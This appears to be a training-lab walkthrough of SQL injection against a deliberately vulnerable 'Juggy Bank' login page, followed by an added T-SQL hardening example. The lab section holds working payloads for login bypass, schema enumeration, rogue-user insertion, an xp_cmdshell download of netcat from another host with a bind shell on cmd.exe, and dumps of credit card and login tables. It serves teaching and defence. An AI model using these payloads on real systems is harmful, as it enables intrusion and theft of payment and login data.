Lab Juggy Bank SQL injection
Juggy Bank SQL Injection Lab

First of all, let's work out what database the system is running. On your 2003 Server, open your web browser and type

    http://localhost/client2.htm

You should have an entry that shows the Juggy Bank web page. In the Login Name box type a single quote ' and press return. This should return an error page showing the database type and the ASP script that has run:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '' and password = ''.
    /login.asp, line 5

As can be seen, the back-end database is MS SQL Server, and the service doesn't handle error messages by redirecting to an oooops page.

Now let's try injecting into the Login Name box. This should bypass the authentication system. In the Login box type

    luke' or 1=1 --

This makes the SQL statement passed to the database the following:

    select * from userinfo where username='luke' or 1=1 -- and password=''

Anything after the -- is ignored as a comment. This should log you into the web page as the first user in the database.

Now let's go back to the login screen and try enumerating the table. The first thing we need is the table name. Enter the following in the Login box:

    ' having 1=1 --

This will cause the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
    /login.asp, line 5

Notice the highlighted information: this gives the table name, userinfo, and the first column name, username. Now we need to know the next columns in the table. Type the following in the Login box:

    ' group by userinfo.username having 1=1 --

This causes the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.password' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /login.asp, line 5

Now let's try once more with userinfo.password:

    ' group by userinfo.password having 1=1 --

The error names the same column we already know, userinfo.username, indicating that the userinfo table has two columns:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'userinfo.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
    /login.asp, line 5

We must now enumerate the column types:

    ' union select sum(username) from userinfo --

This gives the following error, indicating the type is varchar:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
    /login.asp, line 5

And the same for the password column:

    ' union select sum(password) from userinfo --

which is also a varchar.

Now let's create a new user:

    '; insert into userinfo values('john','password')--

Log in with the newly created user.

Further Investigation

Now let's get some information on other databases. Let's put a file on the web server:

    '; exec master..xp_cmdshell "echo I was here on %date% > c:\inetpub\wwwroot\Boo.txt" --

To check that the file is on the server, open http://localhost/Boo.txt

To fetch a file from a TFTP server, e.g. netcat from the 172.16.0.11 server:

    '; exec master..xp_cmdshell 'tftp -i 172.16.0.11 get nc.exe c:\inetpub\wwwroot\nc.exe' --

and then execute it listening on port 9999:

    ';exec master..xp_cmdshell 'c:\inetpub\wwwroot\nc.exe -L -d -e cmd.exe -p 9999' --

You should now be able to telnet to localhost on port 9999.

Now let's dump the credit card details into a text file:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..creditcard" -o c:\inetpub\wwwroot\card_details.txt' --

To fetch those details off the web server, browse to http://localhost/card_details.txt

To dump the login details:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..userinfo" -o c:\inetpub\wwwroot\logins.txt' --

To fetch those details off the web server, browse to http://localhost/logins.txt

Similar commands can be run to mine data on sysdatabases and sysobjects:

    ';exec master..xp_cmdshell 'osql -E -Q "select * from master..sysdatabases" -o c:\inetpub\wwwroot\masterdatabase.txt' --
    ';exec master..xp_cmdshell 'osql -E -Q "select * from juggybank..sysobjects where xtype=''u'' " -o c:\inetpub\wwwroot\juggybanktables.txt' --

In the second statement, xtype=''u'' is two sets of single quotes, not a double quote. To fetch those details off the web server, browse to http://localhost/masterdatabase.txt and http://localhost/juggybanktables.txt

Another way with stored procedures

The above can also be achieved by using a stored procedure:

    '; exec sp_makewebtask "c:\inetpub\wwwroot\evil.html", "select * from userinfo"; --

Now request this page with http://localhost/evil.html
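Every step of the lab depends on three conditions: the login form's fields are concatenated into the SQL text of login.asp, the raw ODBC error is echoed back to the browser, and the database connection runs with enough privilege to reach xp_cmdshell and sp_makewebtask. The T-SQL below is an added example written for this page, not part of the lab material; it shows how the same database would be set up to make those steps fail. It assumes the lab's userinfo(username, password) table, an application login named juggybank_app (an assumed name), and SQL Server 2005 or later for the sp_configure option; on SQL Server 2000, revoke EXECUTE on master..xp_cmdshell from public instead.

```sql
-- Added hardening example for the Juggy Bank lab (not part of the original lab).
-- Assumes: database juggybank, table dbo.userinfo(username varchar, password varchar),
-- and an application login juggybank_app (assumed name, placeholder password).
USE juggybank;
GO

-- 1. Parameterised login check. login.asp should call this procedure with typed
--    parameters instead of building a SELECT from the form fields. A submitted
--    value such as  luke' or 1=1 --  is compared literally against the username
--    column; it never becomes part of the SQL text, so the ' and -- are inert.
CREATE PROCEDURE dbo.usp_CheckLogin
    @username varchar(50),
    @password varchar(50)
AS
BEGIN
    SET NOCOUNT ON;
    SELECT COUNT(*) AS matched
    FROM dbo.userinfo
    WHERE username = @username
      AND password = @password;
END
GO

-- 2. Least privilege for the web application's connection. It gets EXECUTE on the
--    login procedure only; no direct rights on userinfo or creditcard, and it is not
--    a member of sysadmin. The lab's osql -E and xp_cmdshell calls only work because
--    the page connects with an administrative account.
CREATE LOGIN juggybank_app WITH PASSWORD = '<placeholder-strong-password>';
CREATE USER juggybank_app FOR LOGIN juggybank_app;
GRANT EXECUTE ON dbo.usp_CheckLogin TO juggybank_app;
GO

-- 3. Disable command execution at the server level (SQL Server 2005 and later).
--    sp_makewebtask no longer exists on these versions; on SQL Server 2000 revoke
--    EXECUTE on both master..xp_cmdshell and master..sp_makewebtask from public.
USE master;
GO
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
GO

-- 4. Checks a defender can run after the change.
--    Expected: value_in_use = 0 for xp_cmdshell, and app_is_sysadmin = 0.
SELECT name, value_in_use
FROM sys.configurations
WHERE name = 'xp_cmdshell';

SELECT IS_SRVROLEMEMBER('sysadmin', 'juggybank_app') AS app_is_sysadmin;
```

With this in place, the single-quote probe from the start of the lab no longer produces an "Unclosed quotation mark" error, because the quote is data rather than syntax; the remaining fix is on the IIS side, where custom error pages keep ODBC error text (and with it the table and column names the lab harvests) out of the HTTP response. The lab stores passwords in clear text; the procedure above keeps that schema only so it maps directly onto the lab's table.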